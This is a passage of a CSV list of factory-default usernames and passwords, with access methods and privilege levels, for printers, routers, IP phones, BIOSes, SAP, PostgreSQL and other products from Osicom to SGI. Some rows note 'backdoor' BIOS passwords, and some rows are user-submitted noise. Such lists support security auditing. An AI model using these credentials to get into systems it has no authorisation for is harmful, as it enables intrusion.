T/N,sysadm,sysadm,,, +osicom,NETPrint,,Admin,Manager,Manager,,, +osicom,NETPrint,,Admin,sysadm,sysadm,,, +osicom,NETPrint,,User,debug,d.e.b.u.g,,, +osicom,NETPrint,,User,echo,echo,,, +osicom,NETPrint,,User,guest,guest,,, +osicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/D,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1000E/D,Telnet,echo,echo,User,, +osicom,NETPrint,1000E/D,Telnet,guest,guest,User,, +osicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1000E/NDS,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1000E/NDS,Telnet,echo,echo,User,, +osicom,NETPrint,1000E/NDS,Telnet,guest,guest,User,, +osicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500 E/B,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1500 E/B,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1500 E/B,Telnet,echo,echo,User,, +osicom,NETPrint,1500 E/B,Telnet,guest,guest,User,, +osicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500E/N,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1500E/N,Telnet,echo,echo,User,, +osicom,NETPrint,1500E/N,Telnet,guest,guest,User,, +osicom,NETPrint,1500E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,2000E/N,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,2000E/N,Telnet,echo,echo,User,, +osicom,NETPrint,2000E/N,Telnet,guest,guest,User,, +osicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,echo,echo,User,, +osicom,NetPrint,500,1000,1500, and 2000 Series,Telnet,guest,guest,User,, +osicom,Osicom Plus T1/PLUS 56k,,,write,private,,, +osicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,,, +osicom,Osicom(Datacom),,,sysadm,sysadm,,, +ovislink,1184AR,all,multi,admin,12345,admin,, +ovislink,AirLive WIAS-1000G,,console,admin,admin,Admin,, +ovislink,BudgeTone 100 series IP Phone,1.1.0.11,,,123,Config (End User),, +ovislink,BudgeTone 100 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),, +ovislink,BudgeTone 200 series IP Phone,1.1.0.11,,,123,Config (End User),, +ovislink,BudgeTone 200 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),, +ovislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),, +ovislink,GXP-2000 IP Phone,1.0.1.9,http,,admin,Config (Advanced User),, +ovislink,HandyTone-286 analog telephone adaptor,,,,123,config,, +ovislink,HandyTone-286 analog telephone adaptor,,,,admin,config,, +ovislink,HandyTone-486 analog telephone adaptor,,,,123,config,, +ovislink,HandyTone-486 analog telephone adaptor,,,,admin,config,, +ovislink,HandyTone-488 analog telephone adaptor,,,,123,Config (End User),, +ovislink,HandyTone-488 analog telephone adaptor,,,,admin,Config (Advanced User),, +ovislink,HandyTone-496 analog telephone adaptor,,,,123,Config (End User),, +ovislink,HandyTone-496 analog telephone adaptor,,,,admin,Config (Advanced User),, +ovislink,IWE1100 WLAN to LAN Bridge,,,root,root,Admin,, +ovislink,SHDSL Modem,B5.1 5-15-2002,,root,root,Admin,, +ovislink,SHDSL Modem,B5.1 5-15-2002,,user,user,Admin,, +ovislink,SR200 Router,,console,,,config,, +ovislink,SR500 Broadband IP Gateway,5.0 and up,http://192.168.1.254,,,config,, +ovislink,WL-1000UR,,http,admin,airlive,admin,, +ovislink,WL-1120AP,,Multi,root,,Admin,, +ovislink,WL-8000AP Wireless G,,http,12345,12345,Admin,, +pachco,AeGIS 9000,All,Console,,0000,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops, +pacific micro data,MAST 9500 Universal Disk Array,,Admin,pmd,,,, +pacific micro data,MAST 9500 Universal Disk Array,,ESM ver. 2.11 / 1,pmd,,,, +pacificmicrodata,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin,, +packard bell,PC BIOS,,,,bell9,,, +packard bell,PC BIOS,,Admin,,bell9,,, +packardbell,,EasyNote_MX37-U-103SP ,,administrador,1234,,, +packardbell,PC BIOS,,,459441,459441,,, +packardbell,PC BIOS,,Console,,bell9,Admin,, +packeteer,Packetshaper,,,,touchpwd=,,, +panasonic,CF-27,4,Multi,,,Admin,, +panasonic,CF-28,,Multi,,,Admin,, +panasonic,CF-45,,Multi,,,Admin,, +panasonic,KX-TD1232,,Multi,admin,1234,Admin,, +panasonic,KX-TDA 100,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,KX-TDA 200,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,KX-TDA 30,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,WV-NP240/244,V1.25-V1.50,http://192.168.0.10,admin,12345,,, +pandatel,EMUX,,,admin,admin,,, +pandatel,EMUX,,,admin,admin,,all, +patton,RAS,,2,monitor,monitor,,, +patton,RAS,,2,superuser,superuser,,, +patton,RAS,2,,monitor,monitor,,, +patton,RAS,2,,superuser,superuser,,, +pbx,PBX (Generic),,,tech,nician,,, +penril datability,vcp300 terminal server,,,,system,,, +penril datability,vcp300 terminal server,,Admin,,system,,, +penrildatability,vcp300 terminal server,,Multi,,system,Admin,, +pentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin,, +pentaoffice,Sat Router,,Telnet,,pento,Admin,, +pentasafe,VigilEnt Security Manager,,3,PSEAdmin,$secure$,,, +pentasafe,VigilEnt Security Manager,,Admin,PSEAdmin,$secure$,,, +pentasafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,, +pentasafe,VigilEnt Security Manager,3.0,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,, +perle,CS9000,any,Console,admin,superuser,Admin,, +philips,Praesideo PA System,,Admin,admin,admin,,, +philips,Praesideo PA System,,All versions,admin,admin,,, +philips,Praesideo PA System,All versions,Multi,admin,admin,Admin,, +phoenix,4.0,,Admin,,admin,,, +phoenix,4.0,6.0.2,Multi,,admin,Admin,, +phoenix,PC BIOS,,console,,BIOS,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,CMOS,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,PHOENIX,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,phoenix,Admin,Default/backdoor CMOS password, +phoenix,Phoenix v1.14,,Multi,Administrator,admin,Admin,, +phpreactor,PHPReactor,,1.2.7,core,phpreactor,,, +phpreactor,PHPReactor,1.2.7,http,core,phpreactor,,, +phptest,phpTest,,0.5.6,admin,1234,,, +phptest,phpTest,,0.5.6,guest,guest,,, +phptest,phpTest,0.5.6,http,admin,1234,Admin,, +phptest,phpTest,0.5.6,http,guest,guest,,, +pirelli,,,,on,on,Admin,Used for OnTelecom, +pirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin,, +pirelli,AGE ADSL Router,,Multi,user,password,User,, +pirelli,DRG A225G,,,3play,3play,admin,, +pirelli,DRG A225G,SAPO,192.168.1.1,user,user,admin,, +pirelli,PRGAV4202N,,10.0.0.138,Telek0m,Austria&Eur0,,for Telekom Austria, +pirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin,, +pirelli,Pirelli AGE-UB,,HTTP,admin,microbusiness,Admin,, +pirelli,Pirelli Router,,Multi,admin,microbusiness,Admin,, +pirelli,Pirelli Router,,Multi,admin,mu,Admin,, +pirelli,Pirelli Router,,Multi,user,password,Admin,, +plaintree,Waveswitch,,,,default.password,,, +planet,ADE-4000,,Multi,admin,epicrouter,Admin,, +planet,ADE-4110,,HTTP,admin,epicrouter,Admin,, +planet,Adsl router,,,admin,epicrouter,,, +planet,Adsl router,,Multi,admin,epicrouter,,, +planet,Akcess Point,,HTTP,admin,admin,Admin,, +planet,FGSW-2402RS,,serial,admin,ISPMODE,Admin,, +planet,FNSW-2402S,,,admin, just hit ENTER ,,, +planet,FNSW-2402S,,Console,admin,<> just hit ENTER,,, +planet,GRT-501,,http,root,root,full,, +planet,WAP-1900/1950/2000,,2.5.0,,default,,, +planet,WAP-1900/1950/2000,,Admin,,default,,, +planet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin,, +planet,XRT-401D,,HTTP,admin,1234,Admin,, +pollsafe,Pollsafe,,,SMDR,SECONDARY,,, +pollsafe,Pollsafe,,modem,SMDR,SECONDARY,,, +polycom,SoundPoint IP 601,,,Polycom,456,Device Admin (Web),Admin credentials for Web interface, +polycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User,, +polycom,Soundstation IP 3000,,http,administrator,**#,Admin,, +polycom,ViewStation 4000,,v.35,,,,, +polycom,ViewStation 4000,3.5,Multi,,admin,Admin,, +polycom,ViewStation 4000,3.5,Multi,,x6zynd56,update software,, +polycom,iPower 9000,,Multi,,,Admin,, +postgresql,PostgreSQL,,,postgres,,,, +postgresql,PostgreSQL,,CLI,postgres,,Administrator,, +powerchute,UPS,,,pwrchute,pwrchute,,, +prestige,650,,,admin,1234,Admin,, +prestigio,Nobile,156,Multi,,,Admin,, +prime,PrimeOS,,,dos,dos,,, +prime,PrimeOS,,,fam,fam,,, +prime,PrimeOS,,,guest,guest,,, +prime,PrimeOS,,,guest1,guest,,, +prime,PrimeOS,,,mail,mail,,, +prime,PrimeOS,,,maint,maint,,, +prime,PrimeOS,,,mfd,mfd,,, +prime,PrimeOS,,,netlink,netlink,,, +prime,PrimeOS,,,prime,prime,,, +prime,PrimeOS,,,primenet,primeos,,, +prime,PrimeOS,,,primeos,primeos,,, +prime,PrimeOS,,,primos_cs,prime,,, +prime,PrimeOS,,,system,prime,,, +prime,PrimeOS,,,system,system,,, +prime,PrimeOS,,,tele,tele,,, +prime,PrimeOS,,,test,test,,, +prime,PrimeOS,,Admin,system,prime,,, +prime,PrimeOS,,Admin,system,system,,, +prime,PrimeOS,,Multi,dos,dos,User,, +prime,PrimeOS,,Multi,fam,fam,User,, +prime,PrimeOS,,Multi,guest,guest,User,, +prime,PrimeOS,,Multi,guest1,guest,User,, +prime,PrimeOS,,Multi,guest1,guest1,User,, +prime,PrimeOS,,Multi,mail,mail,User,, +prime,PrimeOS,,Multi,maint,maint,User,, +prime,PrimeOS,,Multi,mfd,mfd,User,, +prime,PrimeOS,,Multi,netlink,netlink,User,, +prime,PrimeOS,,Multi,prime,prime,User,, +prime,PrimeOS,,Multi,prime,primeos,User,, +prime,PrimeOS,,Multi,primenet,primenet,User,, +prime,PrimeOS,,Multi,primenet,primeos,User,, +prime,PrimeOS,,Multi,primeos,prime,User,, +prime,PrimeOS,,Multi,primeos,primeos,User,, +prime,PrimeOS,,Multi,primos_cs,prime,User,, +prime,PrimeOS,,Multi,primos_cs,primos,User,, +prime,PrimeOS,,Multi,system,prime,Admin,, +prime,PrimeOS,,Multi,system,system,Admin,, +prime,PrimeOS,,Multi,tele,tele,User,, +prime,PrimeOS,,Multi,test,test,User,, +prime,PrimeOS,,User,guest,guest,,, +prime,PrimeOS,,User,guest1,guest,,, +prime,PrimeOS,,User,guest1,guest1,,, +prime,PrimeOS,,User,mail,mail,,, +prime,PrimeOS,,User,mfd,mfd,,, +prime,PrimeOS,,User,netlink,netlink,,, +prime,PrimeOS,,User,prime,prime,,, +prime,PrimeOS,,User,primenet,primenet,,, +prime,PrimeOS,,User,primenet,primeos,,, +prime,PrimeOS,,User,primos_cs,prime,,, +prime,PrimeOS,,User,primos_cs,primos,,, +prime,PrimeOS,,User,tele,tele,,, +prime,PrimeOS,,User,test,test,,, +primebase,SQL Database Server,,4.2,Administrator,,,, +primebase,SQL Server,4.2,,Administrator,,,, +prolite,Tru-Color II,version 5,Remote Control,,,,, +prolite,Tru-Color II,version 6,Remote Control,,,,, +prolite,Tru-Color XP,version 8,Remote Control,,,,, +promise,FastTrak TX4310,,HTTP,admin,admin,admin,, +promise,FastTrak TX4310,,admin,admin,admin,,, +prostar,1224,,,,4321,,, +prostar,1224,,Other,,4321,,, +protocraft,authentic train whistle,,,musi1921,Musi%1921,,, +proxim,AP-2000,,,,public,,, +proxim,AP-2000,,,,public,Admin,, +proxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se ,no se,se me perdio el pass quiero recuperarlo, +proxim,ORiNOCO AP-600,,http://169.254.128.132,,public,Administration,, +proxim,ORiNOCO AP-600,all version,192.168.0.2,,,admin,, +proxim,ORiNOCO AP-700,,http://169.254.128.132,,public,Administration,, +proxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint, +proxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215) ,TELNET/HTTP,,public,admin,, +psionteklogix,9150,,HTTP,support,h179350,Admin,, +pyramid computer,BenHur,,Admin,admin,admin,,, +pyramid computer,BenHur,,Admin,admin,gnumpf,,, +pyramid computer,BenHur,,all,admin,admin,,, +pyramidcomputer,BenHur,all,HTTP,admin,admin,Admin,, +pyramidcomputer,BenHur,all,HTTP,admin,gnumpf,Admin,, +qdi,Broadband Gateway 100,,,,password,,, +qdi,Broadband Gateway 100,,Admin,,password,,, +qdi,Broadband Gateway 100,,Telnet/HTTP,,password,Admin,, +qdi,PC BIOS,,,,QDI,,, +qdi,PC BIOS,,Admin,,QDI,,, +qdi,PC BIOS,,Console,,QDI,Admin,, +qdi,SpeedEasy BIOS,,,,lesarotl,,, +qdi,SpeedEasy BIOS,,Admin,,lesarotl,,, +qdi,SpeedEasy BIOS,,Console,,lesarotl,Admin,, +qtec,790RH,,http://192.168.1.1,Admin,,Administration,, +quake,Quake Server,,,,tms,,rcon password; appears to require that you masquerade as 192.246.40.* to use, +qualiteam,X-Cart,,,master,master,,, +quantex,PC BIOS,,,,xljlbj,,, +quantex,PC BIOS,,Admin,,teX1,,, +quantex,PC BIOS,,Admin,,xljlbj,,, +quantex,PC BIOS,,Console,,teX1,Admin,, +quantex,PC BIOS,,Console,,xljlbj,Admin,, +quantum,File Servers,,Most of them,,,,, +quantum,File Servers,,User,,,,, +quantum,File Servers,Most of them,HTTP,,,User,, +quintumtechnologiesinc,Tenor Series,all,Multi,admin,admin,Admin,, +radio shack,TAD-1004,,keypad,,744,,, +radioshack,In-Store Demo PC Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +radioshack,In-Store Demo PC Windows Screen Savers,,,,RS,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +radioshack,TAD-1004,,Multi,,744,keypad,, +radware,Linkproof,,ssh,lp,lp,Admin,, +radware,Linkproof,3.73.03,Multi,radware,radware,Admin,, +raidzone,raid arrays,,,,raidzone,,, +rainbow,IKEY 1000,,,,rainbow,Admin,, +rainbow,IKEY 2000,,,,PASSWORD,,, +rainbow,IKEY,,1000,,rainbow,,, +rainbow,IKEY,,2000,,PASSWORD,,, +ramp networks,WebRamp,,,wradmin,trancell,,, +rampnetworks,WebRamp,,,wradmin,trancell,,, +rapidstream,RS4000-RS8000,,,rsadmin,rsadmin,,Linux, +rapidstream,RapidStream Appliances,,,rsadmin,,,, +raritan,KVM Switches,,,admin,raritan,,, +raritan,KVM Switches,,,admin,raritan,Admin,, +raytalk,RB-300,,,root,root,,, +raytalk,RB-300,,,root,root,Admin,, +rca,DCW615R,,http://192.168.100.1 or http://192.168.0.1,,admin,Administration,, +redhat,Redhat 6.2,,,piranha,piranha,,, +redhat,Redhat 6.2,,,piranha,q,,, +redhat,Redhat 6.2,,HTTP,piranha,piranha,User,, +redhat,Redhat 6.2,,HTTP,piranha,q,User,, +redhat,Redhat 6.2,,User,piranha,piranha,,, +redhat,Redhat 6.2,,User,piranha,q,,, +redline,,,,user,user,192.168.25.2,, +redline,an50,,,admin,admin,,, +redline,an50,02.02,Multi,admin,admin,,, +remedy,Remedy,,,ARAdmin,AR#Admin#,,, +remedy,Remedy,,Multi,Demo,,,, +remedy,Remedy,,multi,ARAdmin,AR#Admin#,Admin,, +remedy,Remedy,,multi,Demo,,,, +research machines,Classroom Assistant,,,manager,changeme,,, +research,PC BIOS,,,,Col2ogro2,,, +research,PC BIOS,,Admin,,Col2ogro2,,, +research,PC BIOS,,Console,,Col2ogro2,Admin,, +researchmachines,Classroom Assistant,,,manager,changeme,,Windows 95, +resumix,Resumix,,,root,resumix,,, +ricoh,1013F,,,,sysadm,,, +ricoh,1224c,,http,,password,,, +ricoh,1232c,-,http,admin,password,admin,, +ricoh,1301f,,,,sysadm,,, +ricoh,2035e,,web,admin,password,,no entry ta administrator, +ricoh,2060,,HTTP,admin,,Admin,, +ricoh,2500,,,admin,blank,admin,, +ricoh,3245C,,,admin,blank,admin,, +ricoh,650,,,,sysadm,http,, +ricoh,AP410N,1.13,HTTP,admin,,Admin,, +ricoh,AP610N,,telnet,admin,,admin,, +ricoh,Aficio 1013 1515 2013 120,,,sysadm,sysadm,,, +ricoh,Aficio 1022,,,Admin,password,,, +ricoh,Aficio 1027,,http://,admin,password,admin,, +ricoh,Aficio 1045,,HTTP,admin,password,,, +ricoh,Aficio 2015,,http,admin,password,,, +ricoh,Aficio 2018D,,http,admin,password,Admin,, +ricoh,Aficio 2020D,,HTTP,admin,password,Admin,, +ricoh,Aficio 2035,,,sisadm,password,,, +ricoh,Aficio 2045e,,http,admin,password,Admin,, +ricoh,Aficio 2075,,,admin,,Admin,, +ricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin, +ricoh,Aficio 2232C,,Telnet,,password,Admin,, +ricoh,Aficio 3025,,,admin,,Admin,, +ricoh,Aficio 3035,,,admin,,Admin,, +ricoh,Aficio 3228,,,admin,,Admin,, +ricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin, +ricoh,Aficio MP 171,,http or telnet,admin,,,, +ricoh,Aficio MP 2000,,,admin,,root acces,, +ricoh,Aficio MP 2500,1.03,HTTP,admin,,Administrator,, +ricoh,Aficio MP 2550,,web interface,admin,,admin,, +ricoh,Aficio MP 3350,,,admin,,administrator,, +ricoh,Aficio MP 4500,,,admin,,,, +ricoh,Aficio MP 5500,2.08,Telnet / HTTP,admin,,Admin,, +ricoh,Aficio MP C2050,,,admin,,Administrator,, +ricoh,Aficio MP C2800,,,admin,,,, +ricoh,Aficio MP C4000,,,admin,,,, +ricoh,Aficio MP C4500,,HTTP,admin,,admin,, +ricoh,Aficio SP 4210N,,Web Interface,admin,,,, +ricoh,Aficio SP C220N,,http,Admin,,,case sensitive must have upper case A, +ricoh,Aficio,1515,http,administrator,password,administrator access,, +ricoh,Aficio,2027,,admin,password,,, +ricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin,, +ricoh,Aficio,CL100N,Web,admin,password,,, +ricoh,Aficioh,,Administrator,admin,,,, +ricoh,Africo MP 161,,Telnet/HTTP,admin,,Administrator,, +ricoh,C231N,,,Admin,password,,A must be capitalized in username, +ricoh,CL2000N,,,admin,password,,, +ricoh,CL3500N,,GUI,admin,leave blank,,, +ricoh,DSC338 Printer,1.19,HTTP,,password,Admin,no user, +ricoh,MFP 2550,,web interface,admin,,admin,, +ricoh,MP 161SPF,,Http://,admin,,,, +ricoh,MP 7500,2.02.1,HTTP,admin,,Admin,Webpage admin, +ricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica, +ricoh,MP C4000,,http,admin,,Admin Access,, +ricoh,MP C6000,,HTTP,admin,N/A,Web admin,, +ricoh,MP4000,,web,admin,,,, +ricoh,SP 4100N,,web interface,admin,,,leave password black, +ricoh,SP C232DN,,,Admin,password,,note A is capitalized, +ricoh,SP C311N,,HTTP,Admin,,Config.-Admin,Username is case-sensitive, +ricoh,SP C311N,,http,Admin,,,, +ricoh,SP C311N,,http,Admin,password,,, +ricoh,SPC232,all versions,http,Admin,,admin,, +ricoh,afcio mp 161,,telnet http,admin,,,, +ricoh,aficio 650 windows xp,all versions,http//192.168.1.4,,,admin,, +riverbed,Acelerador,,http,Admin,password,,, +rizen,WebGUI,,,Admin,123qwe,,, +rizen,WebGUI,,,Admin,123qwe,Admin,, +rm,RM Connect,,,RMUser1,password,,, +rm,RM Connect,,,admin,rmnetlm,,, +rm,RM Connect,,,admin2,changeme,,, +rm,RM Connect,,,adminstrator,changeme,,, +rm,RM Connect,,,deskalt,password,,, +rm,RM Connect,,,deskman,changeme,,, +rm,RM Connect,,,desknorm,password,,, +rm,RM Connect,,,deskres,password,,, +rm,RM Connect,,,guest,,,, +rm,RM Connect,,,replicator,replicator,,, +rm,RM Connect,,,setup,changeme,,, +rm,RM Connect,,,teacher,password,,, +rm,RM Connect,,,temp1,password,,, +rm,RM Connect,,,topicalt,password,,, +rm,RM Connect,,,topicnorm,password,,, +rm,RM Connect,,,topicres,password,,, +rm,RM Connect,,Main Login,PROPAGATE,APPLICATION,Full,used in school, +rm,RM Connect,,Multi,RMUser1,password,,, +rm,RM Connect,,Multi,admin,rmnetlm,,, +rm,RM Connect,,Multi,admin2,changeme,,, +rm,RM Connect,,Multi,adminstrator,changeme,,, +rm,RM Connect,,Multi,deskalt,password,,, +rm,RM Connect,,Multi,deskman,changeme,,, +rm,RM Connect,,Multi,desknorm,password,,, +rm,RM Connect,,Multi,deskres,password,,, +rm,RM Connect,,Multi,guest,,,, +rm,RM Connect,,Multi,replicator,replicator,,, +rm,RM Connect,,Multi,setup,changeme,,, +rm,RM Connect,,Multi,teacher,password,,, +rm,RM Connect,,Multi,temp1,password,,, +rm,RM Connect,,Multi,topicalt,password,,, +rm,RM Connect,,Multi,topicnorm,password,,, +rm,RM Connect,,Multi,topicres,password,,, +rm,RM Connect,,Propagating!,PROPAGATE,APPLICATION,Full,used in school, +rm,Server BIOS,,,,RM,,, +rm,Server BIOS,,Console,,RM,,, +rm,computer,,Other,administrator,password/changeme or secret,l:/ and take of restrictions,, +rnn,RNN's Guestbook,1.2,http,admin,demo,Admin,, +roamabout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin,, +rodopi,Rodopi billing software 'AbacBill' sql database,,,rodopi,rodopi,,, +rodopi,Unknown,,,Rodopi,Rodopi,,, +safecom,Router,,Admin,admin,epicrouter,,, +safecom,Router,,Multi,admin,epicrouter,Admin,, +sagem,F@ST ,2404,Telnet , SSH , HTTP,admin,administrator, +sagem,Fast 1200 (Fast 1200),,Telnet,root,1234,User,root/1234, +sagem,Fast 1400,,Multi,admin,epicrouter,Admin,, +sagem,Fast 1400w,,Multi,root,1234,Admin,, +sambar technologies,Sambar Server,,,admin,,,, +sambar technologies,Sambar Server,,,anonymous,,,, +sambar technologies,Sambar Server,,,billy-bob,,,, +sambar technologies,Sambar Server,,,ftp,,,, +sambar technologies,Sambar Server,,,guest,guest,,, +sambartechnologies,Sambar Server,,http,admin,,Admin,, +sambartechnologies,Sambar Server,,http,anonymous,,,, +sambartechnologies,Sambar Server,,http,billy-bob,,,, +sambartechnologies,Sambar Server,,http,ftp,,Admin,, +sambartechnologies,Sambar Server,,http,guest,guest,Admin,, +samsung,AHT-E300,Multi,admin,password,Admin,,, +samsung,E700,,Password,Moeketsik,874434,,, +samsung,N620,,Multi,,,Admin,, +samsung,SGH E700,,,,874434,User,Sms, +samsung,SGH E700,,,Samsung,,,Sms, +samsung,SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203, +samuel abels,Ammerum,,0.6-1,user,password,,, +samuelabels,Ammerum,0.6-1,,user,password,,, +sap,Business Connector,,4.7,Administrator,manage,,, +sap,Business Connector,,4.7,Developer,isdev,,, +sap,Business Connector,,4.7,Replicator,iscopy,,, +sap,Business Connector,4.7,,Administrator,manage,Admin,, +sap,Business Connector,4.7,,Developer,isdev,Admin,, +sap,Business Connector,4.7,,Replicator,iscopy,Admin,, +sap,ITS,,,itsadmin,init,,, +sap,SAP Local Database,,,SAPR3,SAP,,, +sap,SAP,,,DDIC,19920706,,, +sap,SAP,,,EARLYWATCH,SUPPORT,,, +sap,SAP,,,SAP*,7061992,,, +sap,SAP,,,SAPCPIC,ADMIN,,, +sap,SAP,,000 001 066,SAP*,06071992,,, +sap,SAP,,000 001,DDIC,19920706,,, +sap,SAP,,000,SAPCPIC,ADMIN,,, +sap,SAP,,066,EARLYWATCH,SUPPORT,,, +sap,SAP,,Admin,SAPCPIC,ADMIN,,, +sap,SAP,,Mandant 066,SAP,SAP internal,,, +sap,SAP,,R/3,DDIC,19920706,,, +sap,SAP,,R/3,EARLYWATCH,SUPPORT,,, +sap,SAP,,R/3,SAP*,06071992,,, +sap,SAP,,R/3,SAPCPIC,ADMIN,,, +sap,SAP,,R/3,TMSADM,,,, +sap,SAP,,SAP internal,DDIC,19920706,,, +sap,SAP,,SAP internal,EARLYWATCH,SUPPORT,,, +sap,SAP,,SAP internal,SAP*,07061992,,, +sap,SAP,,SAP internal,SAP*,PASS,,, +sap,SAP,R/3,,SAP*,06071992,,, +sap,SAP,R/3,,TMSADM,,,, +sap,SAP,R/3,SAP client,DDIC,19920706,SAP internal; Mandant 001,, +sap,SAP,R/3,SAP client,EARLYWATCH,SUPPORT,SAP internal; Mandant 066,, +sap,SAP,R/3,SAP client,SAP*,07061992,SAP internal; Mandant 066,, +sap,SAP,R/3,SAP client,SAP*,PASS,SAP internal; all Mandants,, +sap,SAP,R/3,SAP client,SAPCPIC,ADMIN,Admin,, +savin,C2525,,HTTP,admin,blank,Admin,, +schneider electric,PowerLogic Ethernet Communications Card,,,,admin,,, +schneiderelectric,PowerLogic ethernet card,,http,,admin,Admin,, +scientificatlanta,2100,comcast-supplied,http,admin,w2402,diagnostics page,192.168.100.1, +scientificatlanta,2320,,http://192.168.0.1./,admin,W2402,,, +scientificatlanta,2320,,http://192.168.100.1,,,,, +scientificatlanta,DPR2325R3,3.0,192.168.0.1,admin,W2402,Admin,, +scientificatlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1, +scientificatlanta,EPC2100R2,HW Rev 2.1,modem,,,admin,, +scientificatlanta,EPC2505,1.0,http://192.168.100.1,admin,W2402,status,, +scientificatlanta,EPR2320R2,2.0,192.168.0.1,,Admin,,, +scientificatlanta,EPR2320R2,v2.0.2r1262-070212,192.168.0.1,admin,admin,admin,nao consigo entra no router, +scientificatlanta,EPR2325R3,3.0,http://192.168.100.1,admin,admin,admin,, +scientificatlanta,SERVICE ELECTRIC CABLE (SECABLE),SERVICE ELECTRIC CABLE (SECABLE),http://192.168.100.1/,admin,W2402,Status,Status Page, +scientificatlanta,WebSTAR EPC2100R2, 2.0,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,, +scientificatlanta,epr2325r3,all,http://192.168.100.1/,,,Admin,, +seagullscientific,Track'Em,,,ADMIN,admin,Admin,, +seagullscientific,Track'Em,,,USER,USER,Admin,, +securicor3net,Cezanne,,,manager,friend,,, +securicor3net,Cezzanne,,,manager,friend,,any, +securicor3net,Monet,,,manager,friend,,any, +security.org,lockpicking,,,admin,,,, +securstar,ikey,,admin,admin,rainbow,,, +securstar,ikey,1000,Multi,admin,rainbow,admin,, +semaphore,PICK O/S,,,DESQUETOP,,,, +semaphore,PICK O/S,,,DS,,,, +semaphore,PICK O/S,,,DSA,,,, +semaphore,PICK O/S,,,PHANTOM,,,, +senao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1, +server technology,Sentry Remote Power Manager,,,ADMN,admn,,, +server technology,Sentry Remote Power Manager,,,GEN1,gen1,,, +server technology,Sentry Remote Power Manager,,,GEN2,gen2,,, +server technology,Sentry Remote Power Manager,,Admin,ADMN,admn,,, +server technology,Sentry Remote Power Manager,,view/control,GEN1,gen1,,, +server technology,Sentry Remote Power Manager,,view/control,GEN2,gen2,,, +servertechnology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001, +servertechnology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001, +servertechnology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001, +sgi,Embedded Support Partner,,,Administrator,Partner,,IRIX 6.5.6, +sgi,IRIX,,,EZsetup,,,ALL, 